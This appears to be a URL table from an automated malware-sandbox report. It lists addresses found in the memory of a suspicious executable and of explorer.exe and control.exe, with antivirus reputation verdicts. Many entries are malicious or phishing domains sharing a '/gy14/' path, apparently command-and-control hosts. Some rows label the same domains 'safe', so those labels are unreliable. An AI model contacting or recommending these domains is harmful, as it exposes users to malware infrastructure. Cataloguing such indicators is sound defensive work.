https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000006.00000003.3107844598.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1672845472.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4103472130.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3429507996.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.naples.beautyReferer:	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.zezfhys.com/gy14/www.batuoe.com	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.mtdiyx.xyz/gy14/www.whatsapp1.autos	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	12%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://www.namecheap.com/domains/registration/results/?domain=tulisanemas.com	explorer.exe, 00000006.00000002.4111127345.000000001170F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000008.00000002.4100435255.000000000584F000.00000004.10000000.00040000.00000000.sdmp	false		high
http://www.8x101n.xyz	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.venitro.com	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.whatsapp1.autos	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://excel.office.com	explorer.exe, 00000006.00000002.4106973998.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1678060196.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.budgetnurseries.com	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.mtdiyx.xyz/gy14/	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we	explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.truedatalab.com	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.grow-services.net/api/grow/soap/#getPdfT	z2______________________________.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.grow-services.net/api/grow/soap/#registerBabyT	z2______________________________.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.mrbmed.com/gy14/	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.venitro.comReferer:	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	explorer.exe, 00000006.00000002.4101465452.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.loscaseros.comReferer:	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dianetion.com/gy14/www.budgetnurseries.com	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.galapagosdesign.com/DPlease	z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.mtdiyx.xyzReferer:	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000006.00000003.3106112288.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1678060196.000000000C893000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.tulisanemas.com/gy14/www.zezfhys.com	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.urwpp.deDPlease	z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.grow-services.net/api/grow/soap/#clearDataT	z2______________________________.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.zhongyicts.com.cn	z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	z2______________________________.exe, 00000000.00000002.1680655312.0000000002716000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.truedatalab.comReferer:	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mrbmed.comReferer:	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.smnyg.comReferer:	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.batuoe.com/gy14/	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.beautyloungebydede.online/gy14/www.truedatalab.com	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://wns.windows.com/L	explorer.exe, 00000006.00000000.1678060196.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4106973998.000000000C557000.00000004.00000001.00020000.00000000.sdmp	false		high
https://word.office.com	explorer.exe, 00000006.00000002.4106973998.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1678060196.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		high
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	explorer.exe, 00000006.00000002.4101465452.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.grow-services.net/api/grow/soap/#registerBirthT	z2______________________________.exe	false	Avira URL Cloud: safe	unknown
http://www.grow-services.net/api/grow/soap/#removeMeasurementT	z2______________________________.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.whatsapp1.autos/gy14/www.venitro.com	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	10%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.grow-services.net/api/grow/soap/#updateMeasurementT	z2______________________________.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.tulisanemas.com/gy14/	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://schemas.micr	explorer.exe, 00000006.00000000.1667913063.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4101465452.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.theanhedonia.com/gy14/	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.zezfhys.comReferer:	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zezfhys.com	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/frere-user.html	z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.naples.beauty/gy14/www.8x101n.xyz	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.rd.com/list/polite-habits-campers-dislike/	explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://android.notify.windows.com/iOS	explorer.exe, 00000006.00000002.4106973998.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1678060196.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.mtdiyx.xyz	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://img.sedoparking.com/templates/images/hero_nc.svg	explorer.exe, 00000006.00000002.4111127345.000000001170F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000008.00000002.4100435255.000000000584F000.00000004.10000000.00040000.00000000.sdmp	false		high
http://www.truedatalab.com/gy14/www.dianetion.com	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	explorer.exe, 00000006.00000002.4101465452.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.venitro.com/gy14/	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.8x101n.xyz/gy14/	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://outlook.com_	explorer.exe, 00000006.00000002.4106973998.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1678060196.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	low
http://www.smnyg.com/gy14/	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.dianetion.comReferer:	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.batuoe.comReferer:	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.naples.beauty/gy14/	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.fontbureau.com/designersG	z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	false		high
